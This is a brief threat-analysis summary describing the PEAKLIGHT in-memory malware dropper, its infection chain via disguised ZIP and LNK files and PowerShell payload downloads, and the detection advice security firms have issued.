Threat Analysis: Morphisec Protects Against PEAKLIGHT In-Memory Malware - #PEAKLIGHT
Recent reports from cybersecurity firms like Mandiant and Morphisec have identified and analyzed a sophisticated new malware named PEAKLIGHT, which targets Windows systems. This memory-only dropper, distributed through malicious ZIP files disguised as pirated movies, initiates a multi-stage infection chain that employs various evasion techniques, including CDN abuse and system binary proxy execution. PEAKLIGHT utilizes PowerShell scripts to download additional payloads such as LUMMAC.V2, SHADOWLADDER, and CRYPTBOT from remote servers, with scripts heavily obfuscated using techniques like hexadecimal and Base64 encoding. The malware's infection vector starts with LNK files in ZIP archives, leading to the execution of second-stage payloads if specific files are not found in predefined directories. Security firms have provided detection tools, such as YARA rules, and recommend maintaining updated security software and being cautious of suspicious downloads. The emergence of PEAKLIGHT highlights the need for robust cybersecurity measures and the importance of sharing insights within the cybersecurity community to combat such threats.